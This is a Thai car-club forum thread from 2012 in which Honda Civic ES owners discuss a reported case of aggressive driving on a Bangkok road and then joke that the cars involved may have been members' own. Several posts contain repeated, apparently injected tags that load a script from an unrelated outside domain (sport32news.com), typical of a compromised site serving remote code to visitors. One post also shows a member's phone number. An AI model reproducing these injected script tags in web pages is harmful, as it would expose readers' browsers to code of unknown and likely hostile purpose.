ตอบ
FuckTong

ชื่อเล่น: เอ๋

เข้าร่วม: 21 เมษา 2011
ตอบ: 4394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2463
ให้คำขอบคุณ: 2244

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 28 สิงหา 2012 10:46 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ช่วงนี้เห็นมีESเยอะมากทั้งที่ไม่ติด URL และติด URL แต่ส่วนมากถ้าเจอพี่ๆน้องๆในคลับที่ติดURLเราก็จะทักทาย บีบแตร์ ปิ๊นๆกัน แต่บางคันที่ไม่ติด URL ผมไม่แน่ใจนะว่าอยู่ในคลับหรือปล่าว บางทีเจอก็มีท่าทาง ออกจะกวนๆนิดๆไม่ทราบสาเหตูที่อยากจะทักเรารึป่าว หรือจะยังไง  เช่น การขับแบบกวนๆอย่างปาดไปก็ปาดมา เร่งเครื่องใส่ ( นานๆจะเจอทีนะครับ ) อย่างเมื่อเช้าผมทำงานอยู่ พัฒนาการ ก็จะเจอคันนึงประจำเลย ไม่ขอเอ่ย สี และ ทะเบียน ผมก็ขับมาดีๆไม่ได้เร็วมากมาย แล้วพี่ท่านก็ปาดเข้ามาผมวิ่งเลนขวา ( ดีนะเบครทันไม่งั้นก็นอนอู่แน่ๆ ) ซะงั้นแล้วก็โยกออกซ้าย อยู่อย่างงี้ประมาณ2-3รอบ ผมก็เลยเปิดกระจกลง แล้วลองขับตามไปใกล้ ดูดิ๊ว่าเค้าจาทักเรามั้ย แต่!! แมร่งกับเร่งเรื่องใส่เสียงดังสนั่น แล้วทำหน้ากวนส้น.... ไอ้เราก็ไม่ได้ติดใจอะไร เพราะเจอมาเยอะ แต่ไม่เท่ากับที่เจอกับคันนี้เลย  แล้วมีพี่ๆเพื่อนๆเคยเจอเหตุการณ์แบบนี้บ้างมั้ยเอ่ย ถ้าเคยเจอแล้วทำยังไงเอามาแชร์ให้ฟังหน่อยเผื่อจะเจอพี่ท่อดังขับกวนๆคันนั้นอีกในวันต่อไป
ได้รับคำขอบคุณจาก: tokykung  golfband  eschocolate  Chonchy  MALLMAR  P.TER.357  LnwwasaD  dangeroustoy  focusyo  ahingrace  OaInTerEs  Nung_Sodapop  ipound  kim_possible  mayuct  Es_SaLaRyMaN  moonoy 
tokykung

ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ปี: 2002
อังคาร, 28 สิงหา 2012 10:49 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ผมก็เคยเจอครับ...ไม่รู้จะบ้าพลังไปไหน....เห็นแล้วไร้สาระครับ....
ได้รับคำขอบคุณจาก: FuckTong  MALLMAR  fff_1232  dangeroustoy  Nung_Sodapop 
june2000

ชื่อเล่น: ไอจูน

เข้าร่วม: 22 สิงหา 2012
ตอบ: 79

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 56
ให้คำขอบคุณ: 9

สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 28 สิงหา 2012 10:52 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
อันนี้ต้องทำใจครับ
ได้รับคำขอบคุณจาก: FuckTong  MALLMAR  dangeroustoy  Nung_Sodapop 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 28 สิงหา 2012 11:20 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ที่เจอประจำก็คันสีแดงล้อ TE อ่ะครับชอบทำหน้าหล่อใส่ผม"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: FuckTong  MALLMAR  dangeroustoy  Nung_Sodapop 
deo20

เข้าร่วม: 16 ธันวา 2010
ตอบ: 970

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1192
ให้คำขอบคุณ: 107

อังคาร, 28 สิงหา 2012 11:43 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
การทักทายของคนเรามีหลายวิธี
นั่นอาจเป็นวิธีของเขาก็ได้
เห็นรถรุ่นเหมือนกัน สวยๆ
บางทีมันก็อยากลองกันบ้าง
ลองดูครับ สนุกๆ

ได้รับคำขอบคุณจาก: MALLMAR  LnwwasaD  dangeroustoy  Nung_Sodapop 
eschocolate

ชื่อเล่น: เต่า

เข้าร่วม: 19 ตุลา 2011
ตอบ: 1752

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1339
ให้คำขอบคุณ: 1238

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 28 สิงหา 2012 11:55 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
Ae_Aonnut พิมพ์ว่า:
ช่วงนี้เห็นมีESเยอะมากทั้งที่ไม่ติด URL และติด URL แต่ส่วนมากถ้าเจอพี่ๆน้องๆในคลับที่ติดURLเราก็จะทักทาย บีบแตร์ ปิ๊นๆกัน แต่บางคันที่ไม่ติด URL ผมไม่แน่ใจนะว่าอยู่ในคลับหรือปล่าว บางทีเจอก็มีท่าทาง ออกจะกวนๆนิดๆไม่ทราบสาเหตูที่อยากจะทักเรารึป่าว หรือจะยังไง  เช่น การขับแบบกวนๆอย่างปาดไปก็ปาดมา เร่งเครื่องใส่ ( นานๆจะเจอทีนะครับ ) อย่างเมื่อเช้าผมทำงานอยู่ พัฒนาการ ก็จะเจอคันนึงประจำเลย ไม่ขอเอ่ย สี และ ทะเบียน ผมก็ขับมาดีๆไม่ได้เร็วมากมาย แล้วพี่ท่านก็ปาดเข้ามาผมวิ่งเลนขวา ( ดีนะเบครทันไม่งั้นก็นอนอู่แน่ๆ ) ซะงั้นแล้วก็โยกออกซ้าย อยู่อย่างงี้ประมาณ2-3รอบ ผมก็เลยเปิดกระจกลง แล้วลองขับตามไปใกล้ ดูดิ๊ว่าเค้าจาทักเรามั้ย แต่!! แมร่งกับเร่งเรื่องใส่เสียงดังสนั่น แล้วทำหน้ากวนส้น.... ไอ้เราก็ไม่ได้ติดใจอะไร เพราะเจอมาเยอะ แต่ไม่เท่ากับที่เจอกับคันนี้เลย  แล้วมีพี่ๆเพื่อนๆเคยเจอเหตุการณ์แบบนี้บ้างมั้ยเอ่ย ถ้าเคยเจอแล้วทำยังไงเอามาแชร์ให้ฟังหน่อยเผื่อจะเจอพี่ท่อดังขับกวนๆคันนั้นอีกในวันต่อไป

ผมว่าไม่น่าใช่คนในคลับแน่ เพราะถ้าใช่และอยากจะทักทายจิง ๆ เราลดกระจกลงมาแล้วยังไม่มีการทักทายก็ชัดเลยครับว่าไม่ใช่ คงเห็นว่าขับรถแต่งและเป็นรุ่นเดียวกัน ก็เลยอยากจะท้าลองอะไรประมาณนี้อะครับ ส่วนตัวผมยังไม่เคยเจอใครมากวน ๆ แบบนี้นะครับ แต่ถ้าเจอแบบนี้ ผมจัดให้มันแน่ครับ ปาดมากเราก็ปาดกลับซัดหายเลยครับ<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: FuckTong  Modzilla14  MALLMAR  pja  LnwwasaD  dangeroustoy  focusyo  Nung_Sodapop 
Chonchy

ชื่อเล่น: ชล

เข้าร่วม: 12 มกรา 2012
ตอบ: 4143

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7371
ให้คำขอบคุณ: 6492

อังคาร, 28 สิงหา 2012 11:57 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
เคยเจอแต่มาขางๆแล้วเร่งใส่...ผมเลยตัดสินใจ มองหน้าแฟนข้างๆ...

แล้วผมก็ตบซ้าย....อิอิ
ได้รับคำขอบคุณจาก: FuckTong  Modzilla14  MALLMAR  dangeroustoy  Nung_Sodapop 
civicIT

เข้าร่วม: 10 พฤษภาคม 2010
ตอบ: 402

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 538
ให้คำขอบคุณ: 810

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 28 สิงหา 2012 12:01 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
Chonchy พิมพ์ว่า:
เคยเจอแต่มาขางๆแล้วเร่งใส่...ผมเลยตัดสินใจ มองหน้าแฟนข้างๆ...

แล้วผมก็ตบซ้าย....อิอิ

<script src="https://sport32news.com/civicesgroup.js"></  กลัวแฟนมากกว่า เหมือนกันเลย ..........
ได้รับคำขอบคุณจาก: FuckTong  Modzilla14  MALLMAR  dangeroustoy  Nung_Sodapop 
tatumz

เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

อังคาร, 28 สิงหา 2012 12:08 - Re: เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ช่วงนี้เห็นมีESเยอะมากทั้งที่ไม่ติด URL และติด URL แต่ส่วนมากถ้าเจอพี่ๆน้องๆในคลับที่ติดURLเราก็จะทักทาย บีบแตร์ ปิ๊นๆกัน แต่บางคันที่ไม่ติด URL ผมไม่แน่ใจนะว่าอยู่ในคลับหรือปล่าว บางทีเจอก็มีท่าทาง ออกจะกวนๆนิดๆไม่ทราบสาเหตูที่อยากจะทักเรารึป่าว หรือจะยังไง เช่น การขับแบบกวนๆอย่างปาดไปก็ปาดมา เร่งเครื่องใส่ ( นานๆจะเจอทีนะครับ ) อย่างเมื่อเช้าผมทำงานอยู่ พัฒนาการ ก็จะเจอคันนึงประจำเลย ไม่ขอเอ่ย สี และ ทะเบียน ผมก็ขับมาดีๆไม่ได้เร็วมากมาย แล้วพี่ท่านก็ปาดเข้ามาผมวิ่งเลนขวา ( ดีนะเบครทันไม่งั้นก็นอนอู่แน่ๆ ) ซะงั้นแล้วก็โยกออกซ้าย อยู่อย่างงี้ประมาณ2-3รอบ ผมก็เลยเปิดกระจกลง แล้วลองขับตามไปใกล้ ดูดิ๊ว่าเค้าจาทักเรามั้ย แต่!! แมร่งกับเร่งเรื่องใส่เสียงดังสนั่น แล้วทำหน้ากวนส้น.... ไอ้เราก็ไม่ได้ติดใจอะไร เพราะเจอมาเยอะ แต่ไม่เท่ากับที่เจอกับคันนี้เลย แล้วมีพี่ๆเพื่อนๆเคยเจอเหตุการณ์แบบนี้บ้างมั้ยเอ่ย ถ้าเคยเจอแล้วทำยังไงเอามาแชร์ให้ฟังหน่อยเผื่อจะเจอพี่ท่อดังขับกวนๆคันนั้นอีกในวันต่อไป

ถ้าใช่ ES เมื่่อเช้าคันที่ตามหลังรถผม

รถผมเองแหละครับ ยูเทิร์นมาจากใต้สะพานมาแป๊บเดียวเองซึ่งเข้าเลนซ้าย ก้อเห็นรถน้องวิ่งลงมาจากสะพานความเร็วพอได้แหละตามหลังมาซึ่งก้อยังห่างรถผมอยู่เยอะ แล้วผมก้อต้องเข้าเลนกลางเพราะเลนซ้ายรถจอดอยู่ข้างทางเป็นระยะๆ และก้อเปิดไฟเลี้ยวเข้าเลนกลาง คุณน้องก้อเข้าเลนกลางตามผม แล้วผมก้อขับต่อไปแบบธรรมดาไม่เร็วและไม่ขวางทางใครเพราะคันหน้าก้อไม่ได้ใช้ความเร็ว คุณน้องก้อออกเลนขวา และก้อไม่ได้แซงรถผมไป ทั้งที่เวลานั้นถนนข้างหน้าก้อว่าง เมื่อผมวิ่งไปซักระยะนึงเลนที่ผมวิ่งอยู่และเลนซ้ายเริ่มจะติดแล้ว ผมก้อต้องออกเลนขวาและเห็นรถคุณน้องยังห่างอยู่เยอะ ผมก้อเปิดไฟเลี้ยวขวา แล้วก้อเลี้ยวเข้าเลนขวา ระหว่างเลี้ยวและเลี้ยวเข้าเสร็จแล้วก้อเห็นรถคุณน้องยังห่างอยู่ เยอะไม่ได้เบรคแบบหน้าทิ่มจ่อตูดเลย ( ดีนะเบครทันไม่งั้นก็นอนอู่แน่ๆ ) ต่อมาก้อเห็นรถคุณน้องเริ่มขับมาจี้ตูดรถผมแล้วเหมือนจะเล่นด้วย แล้วผมก้อเห็นเลนซ้ายว่างแล้วผมก้อแค่โยกหนีเท่านั้นเพราะไม่ชอบให้ใครมาจี้ตูดรถ และมองกระจกหลังก้อเห็นคุณน้องขับตามมาโยกไปโยกมาเลนโน้นเลนนี้เหมือนกัน และต่อมาผมก้อไม่ได้สนใจแล้วครับ ไม่ได้มองว่ารถคุณน้องลดกระจกลงมาหรือป่าว อีกอย่างที่บอกว่าผมทำหน้ากวนใส่คงไม่ใช่มั้ง เพราะช่วงรถติดผมก้อนั่งคุยกับผู้โดยสารที่มาด้วย ถ้าคุณน้องมองมาที่รถผมก้อคงเห็น กระจกรถผมก้อใสมองเห็นชัดเจน ที่บอกว่าเร่งเครื่องใส่เสียงดัง ช่วงที่รถผมออกตัวก้อคงมีเสียงดังบ้างตามลักษณะท่อแต่งทั่วๆ ไป

ถนนเส้นนี้ตอนเช้าและตอนเย็น รถแต่งหรือไม่แต่ง ส่วนมากก้อเห็นรีบๆ กันทั้งนั้น เพราะรถมันติดมาก เห็นเลนไหนว่างก้อรีบวิ่งเข้าหาเลนนั้น
โยกไปโยกมากัน และที่แน่ๆ ผมก้อเห็น ES อีกคันนึง ที่ชอบขับเร็วและโยกไปโยกมาอยู่ประจำเหมือนกันตอนเช้า

089-661-0791 เกิ้ล.
ได้รับคำขอบคุณจาก: tokykung  MALLMAR  P.TER.357  Ton-  koobe  honeybeex7  dangeroustoy  GaB  zan  focusyo  ahingrace  Nung_Sodapop  ipound 
tatumz

Guru ES
Guru ES

อังคาร, 28 สิงหา 2012 13:02 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ระบบดีแทค ล่มอีกแล้ว
ได้รับคำขอบคุณจาก: MALLMAR  zan  focusyo 
MATOOM

ชื่อเล่น: เต้

เข้าร่วม: 10 สิงหา 2010
ตอบ: 449

ได้รับคำขอบคุณ: 1202
ให้คำขอบคุณ: 277

ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 28 สิงหา 2012 13:04 - Re: เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
tatumz พิมพ์ว่า:

ช่วงนี้เห็นมีESเยอะมากทั้งที่ไม่ติด URL และติด URL แต่ส่วนมากถ้าเจอพี่ๆน้องๆในคลับที่ติดURLเราก็จะทักทาย บีบแตร์ ปิ๊นๆกัน แต่บางคันที่ไม่ติด URL ผมไม่แน่ใจนะว่าอยู่ในคลับหรือปล่าว บางทีเจอก็มีท่าทาง ออกจะกวนๆนิดๆไม่ทราบสาเหตูที่อยากจะทักเรารึป่าว หรือจะยังไง เช่น การขับแบบกวนๆอย่างปาดไปก็ปาดมา เร่งเครื่องใส่ ( นานๆจะเจอทีนะครับ ) อย่างเมื่อเช้าผมทำงานอยู่ พัฒนาการ ก็จะเจอคันนึงประจำเลย ไม่ขอเอ่ย สี และ ทะเบียน ผมก็ขับมาดีๆไม่ได้เร็วมากมาย แล้วพี่ท่านก็ปาดเข้ามาผมวิ่งเลนขวา ( ดีนะเบครทันไม่งั้นก็นอนอู่แน่ๆ ) ซะงั้นแล้วก็โยกออกซ้าย อยู่อย่างงี้ประมาณ2-3รอบ ผมก็เลยเปิดกระจกลง แล้วลองขับตามไปใกล้ ดูดิ๊ว่าเค้าจาทักเรามั้ย แต่!! แมร่งกับเร่งเรื่องใส่เสียงดังสนั่น แล้วทำหน้ากวนส้น.... ไอ้เราก็ไม่ได้ติดใจอะไร เพราะเจอมาเยอะ แต่ไม่เท่ากับที่เจอกับคันนี้เลย แล้วมีพี่ๆเพื่อนๆเคยเจอเหตุการณ์แบบนี้บ้างมั้ยเอ่ย ถ้าเคยเจอแล้วทำยังไงเอามาแชร์ให้ฟังหน่อยเผื่อจะเจอพี่ท่อดังขับกวนๆคันนั้นอีกในวันต่อไป

ถ้าใช่ ES เมื่่อเช้าคันที่ตามหลังรถผม

รถผมเองแหละครับ ยูเทิร์นมาจากใต้สะพานมาแป๊บเดียวเองซึ่งเข้าเลนซ้าย ก้อเห็นรถน้องวิ่งลงมาจากสะพานความเร็วพอได้แหละตามหลังมาซึ่งก้อยังห่างรถผมอยู่เยอะ แล้วผมก้อต้องเข้าเลนกลางเพราะเลนซ้ายรถจอดอยู่ข้างทางเป็นระยะๆ และก้อเปิดไฟเลี้ยวเข้าเลนกลาง คุณน้องก้อเข้าเลนกลางตามผม แล้วผมก้อขับต่อไปแบบธรรมดาไม่เร็วและไม่ขวางทางใครเพราะคันหน้าก้อไม่ได้ใช้ความเร็ว คุณน้องก้อออกเลนขวา และก้อไม่ได้แซงรถผมไป ทั้งที่เวลานั้นถนนข้างหน้าก้อว่าง เมื่อผมวิ่งไปซักระยะนึงเลนที่ผมวิ่งอยู่และเลนซ้ายเริ่มจะติดแล้ว ผมก้อต้องออกเลนขวาและเห็นรถคุณน้องยังห่างอยู่เยอะ ผมก้อเปิดไฟเลี้ยวขวา แล้วก้อเลี้ยวเข้าเลนขวา ระหว่างเลี้ยวและเลี้ยวเข้าเสร็จแล้วก้อเห็นรถคุณน้องยังห่างอยู่ เยอะไม่ได้เบรคแบบหน้าทิ่มจ่อตูดเลย ( ดีนะเบครทันไม่งั้นก็นอนอู่แน่ๆ ) ต่อมาก้อเห็นรถคุณน้องเริ่มขับมาจี้ตูดรถผมแล้วเหมือนจะเล่นด้วย แล้วผมก้อเห็นเลนซ้ายว่างแล้วผมก้อแค่โยกหนีเท่านั้นเพราะไม่ชอบให้ใครมาจี้ตูดรถ และมองกระจกหลังก้อเห็นคุณน้องขับตามมาโยกไปโยกมาเลนโน้นเลนนี้เหมือนกัน และต่อมาผมก้อไม่ได้สนใจแล้วครับ ไม่ได้มองว่ารถคุณน้องลดกระจกลงมาหรือป่าว อีกอย่างที่บอกว่าผมทำหน้ากวนใส่คงไม่ใช่มั้ง เพราะช่วงรถติดผมก้อนั่งคุยกับผู้โดยสารที่มาด้วย ถ้าคุณน้องมองมาที่รถผมก้อคงเห็น กระจกรถผมก้อใสมองเห็นชัดเจน ที่บอกว่าเร่งเครื่องใส่เสียงดัง ช่วงที่รถผมออกตัวก้อคงมีเสียงดังบ้างตามลักษณะท่อแต่งทั่วๆ ไป

ถนนเส้นนี้ตอนเช้าและตอนเย็น รถแต่งหรือไม่แต่ง ส่วนมากก้อเห็นรีบๆ กันทั้งนั้น เพราะรถมันติดมาก เห็นเลนไหนว่างก้อรีบวิ่งเข้าหาเลนนั้น
โยกไปโยกมากัน และที่แน่ๆ ผมก้อเห็น ES อีกคันนึง ที่ชอบขับเร็วและโยกไปโยกมาอยู่ประจำเหมือนกันตอนเช้า

พี่เอิ้ลนี่เอง 555 อนาคตเซตโบด้วยพี่ถึงไม่มีใครจี้ตูดได้  ผมเข้ามาเอาฮานะพี่น้องกันทั้งนั้น ค่อยๆพูดค่อยๆจากันนะครับ^^
ได้รับคำขอบคุณจาก: tokykung  MALLMAR  koobe  dangeroustoy  focusyo 
teparak20

ชื่อเล่น: เทพ

เข้าร่วม: 06 ตุลา 2008
ตอบ: 35

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 40
ให้คำขอบคุณ: 7

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อังคาร, 28 สิงหา 2012 13:10 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
จายเย็นๆครับ
ได้รับคำขอบคุณจาก: MALLMAR  dangeroustoy  focusyo  Nung_Sodapop 
FuckTong

ครอบครัว ES
ครอบครัว ES

อังคาร, 28 สิงหา 2012 13:20 - Re: เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง

ม่ายใช่รถพี่แน่นอนครับ เพราะเอ๋เคยเข้าไปเอาค้ำหน้ามาที่บ้านพี่อะจำรถพี่ได้
ได้รับคำขอบคุณจาก: MALLMAR  dangeroustoy  focusyo  ipound  Nung_Sodapop 
bankabby

ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

อังคาร, 28 สิงหา 2012 13:28 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ยังไงกันเนี่ย 
ได้รับคำขอบคุณจาก: MALLMAR  dangeroustoy 
MALLMAR

เข้าร่วม: 19 พฤศจิกา 2010
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 520
ให้คำขอบคุณ: 6319

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 28 สิงหา 2012 13:33 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
...
ได้รับคำขอบคุณจาก: bankabby  dangeroustoy 
prgs55

ชื่อเล่น: เล็ก

เข้าร่วม: 26 มิถุนา 2010
ตอบ: 861

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1794
ให้คำขอบคุณ: 1103

สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 28 สิงหา 2012 13:38 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ดีนะผมอยู่แถวรามคำแหง รอดไป
ได้รับคำขอบคุณจาก: dangeroustoy 
FuckTong

ครอบครัว ES
ครอบครัว ES

อังคาร, 28 สิงหา 2012 13:41 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ขอสรุปว่าไม่ใช่รถ พี่เกิ้ล นะ ทุกคนอย่างคิดกันไปนะครับ เพราะเส้นทางที่พี่เกิ้ลกล่าวมาอาจจะไม่ใช่รถเอ๋ครับ ของเอ๋มันไม่ได้เกิดเหตุการณ์ตรงลงสะพานพัฒนาการ ( ที่มาจากแยกผาสุก ) แต่มันเกิดตงลงสะพานข้ามแม๊กแวลู่พัฒนาการมาแล้ว 555+ แต่ก็ไม่ได้โมโหหรือโกดเครืองอะไรมากมายกันรถคันดังกล่าวครับ  รักพี่น้องในครอบครัESทุกคนครับ
ได้รับคำขอบคุณจาก: KAATO  dangeroustoy  focusyo  Nung_Sodapop  moonoy 
patoo

ชื่อเล่น: พงษ์

เข้าร่วม: 28 สิงหา 2010
ตอบ: 1273

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5438
ให้คำขอบคุณ: 3559

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 28 สิงหา 2012 13:41 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
เหอๆ

ได้รับคำขอบคุณจาก: dangeroustoy 
tatumz

Guru ES
Guru ES

อังคาร, 28 สิงหา 2012 14:06 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
ขอสรุปว่าไม่ใช่รถ พี่เกิ้ล นะ ทุกคนอย่างคิดกันไปนะครับ เพราะเส้นทางที่พี่เกิ้ลกล่าวมาอาจจะไม่ใช่รถเอ๋ครับ ของเอ๋มันไม่ได้เกิดเหตุการณ์ตรงลงสะพานพัฒนาการ ( ที่มาจากแยกผาสุก ) แต่มันเกิดตงลงสะพานข้ามแม๊กแวลู่พัฒนาการมาแล้ว 555+ แต่ก็ไม่ได้โมโหหรือโกดเครืองอะไรมากมายกันรถคันดังกล่าวครับ รักพี่น้องในครอบครัESทุกคนครับ

กร๊ากกกกก ๆ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></   ตรูว่าแล้วมันแหม่งๆ ยังไง  เหตุการณ์ลักษณะคล้ายกันมากๆ ครับน้องเอ๋ พัฒนการเหมือนกันแต่คนละจุด 555  คันนี้เจอบ่อยเหมือนกันขับเร็ว   ถ้าเจ้าของรถเข้ามาอ่าน วันหลังลงจากสะพานมา เบาบ้างก้อได้ครับ  รถยูเทิร์นมาและรถที่จอดขวางทางอยู่เลนซ้ายมันเยอะ เสียววววว จร้า

ปล.เห็นรถเรากลาก เลยชอบเข้าหาประจำ โดยเฉพาะข้างหลัง 
ได้รับคำขอบคุณจาก: KAATO  dangeroustoy  zan  Nung_Sodapop 
tatumz

Guru ES
Guru ES

อังคาร, 28 สิงหา 2012 14:09 - Re: เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
MATOOM พิมพ์ว่า:
พี่เอิ้ลนี่เอง 555 อนาคตเซตโบด้วยพี่ถึงไม่มีใครจี้ตูดได้ ผมเข้ามาเอาฮานะพี่น้องกันทั้งนั้น ค่อยๆพูดค่อยๆจากันนะครับ^^

เด๋วคงต้องตามหาอาจารย์หนึ่ง มาช่วยดีกว่า อั๊บ  <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
อังคาร, 28 สิงหา 2012 14:11 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
เชิญคุณริวแล้วงานนี้
FuckTong

ครอบครัว ES
ครอบครัว ES

อังคาร, 28 สิงหา 2012 14:23 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง

ขอสรุปว่าไม่ใช่รถ พี่เกิ้ล นะ ทุกคนอย่างคิดกันไปนะครับ เพราะเส้นทางที่พี่เกิ้ลกล่าวมาอาจจะไม่ใช่รถเอ๋ครับ ของเอ๋มันไม่ได้เกิดเหตุการณ์ตรงลงสะพานพัฒนาการ ( ที่มาจากแยกผาสุก ) แต่มันเกิดตงลงสะพานข้ามแม๊กแวลู่พัฒนาการมาแล้ว 555+ แต่ก็ไม่ได้โมโหหรือโกดเครืองอะไรมากมายกันรถคันดังกล่าวครับ รักพี่น้องในครอบครัESทุกคนครับ

กร๊ากกกกก ๆ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ตรูว่าแล้วมันแหม่งๆ ยังไง เหตุการณ์ลักษณะคล้ายกันมากๆ ครับน้องเอ๋ พัฒนการเหมือนกันแต่คนละจุด 555 คันนี้เจอบ่อยเหมือนกันขับเร็ว ถ้าเจ้าของรถเข้ามาอ่าน วันหลังลงจากสะพานมา เบาบ้างก้อได้ครับ รถยูเทิร์นมาและรถที่จอดขวางทางอยู่เลนซ้ายมันเยอะ เสียววววว จร้า

ปล.เห็นรถเรากลาก เลยชอบเข้าหาประจำ โดยเฉพาะข้างหลัง

เหตุการณ์เหมือนกัน แต่คนละที่ 555+ 
ปล.  ถ้าเป็นพี่เกิ้ลจิงๆนะน้องชวนโดดงาน ปายหารายทำดีฟ่า
eschocolate

ชื่อเล่น: เต่า

เข้าร่วม: 19 ตุลา 2011
ตอบ: 1752

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1339
ให้คำขอบคุณ: 1238

อังคาร, 28 สิงหา 2012 15:38 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง

กร๊ากกกกก ๆ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ตรูว่าแล้วมันแหม่งๆ ยังไง เหตุการณ์ลักษณะคล้ายกันมากๆ ครับน้องเอ๋ พัฒนการเหมือนกันแต่คนละจุด 555 คันนี้เจอบ่อยเหมือนกันขับเร็ว ถ้าเจ้าของรถเข้ามาอ่าน วันหลังลงจากสะพานมา เบาบ้างก้อได้ครับ รถยูเทิร์นมาและรถที่จอดขวางทางอยู่เลนซ้ายมันเยอะ เสียววววว จร้า

เหตุการณ์เหมือนกัน แต่คนละที่ 555+ 
ปล.  ถ้าเป็นพี่เกิ้ลจิงๆนะน้องชวนโดดงาน ปายหารายทำดีฟ่า

สรุป สถานที่เดียวกัน เกิดเหตุการณ์ 2 จุดในเวลาใกล้กัน ผมว่านะ ทั้งคุณเอ๋และคุณเกิ้ล อาจจะเจอรถคันเดียวกันก็ได้นะครับ ฮ่าาาา<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: FuckTong  dangeroustoy 
LnwwasaD

ชื่อเล่น: เฟริท

เข้าร่วม: 10 เมษา 2012
ตอบ: 3543

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2843
ให้คำขอบคุณ: 2957

อังคาร, 28 สิงหา 2012 15:52 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
5555555+ ......  เป็นผม ก็งง  ถ้าเจอเหตุการณ์แบบนี้   แต่ถ้าเล่นไม่เลิก   ผมก็ กัดตูดอยู่นั้นละ 555555+........   
ได้รับคำขอบคุณจาก: FuckTong  dangeroustoy 
Saka

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

อังคาร, 28 สิงหา 2012 15:58 - เพิ่งเคยเจอมากับตัวเองถึงกับเซ็ง
รถเราป่าวหว่า วิ่งพัฒนาการทุกวันเหมือนกัน
แต่ผมจำได้ว่าเมื่อเช้าไม่เจอ ES หล่อ ๆ เลยนะ
pattarachok

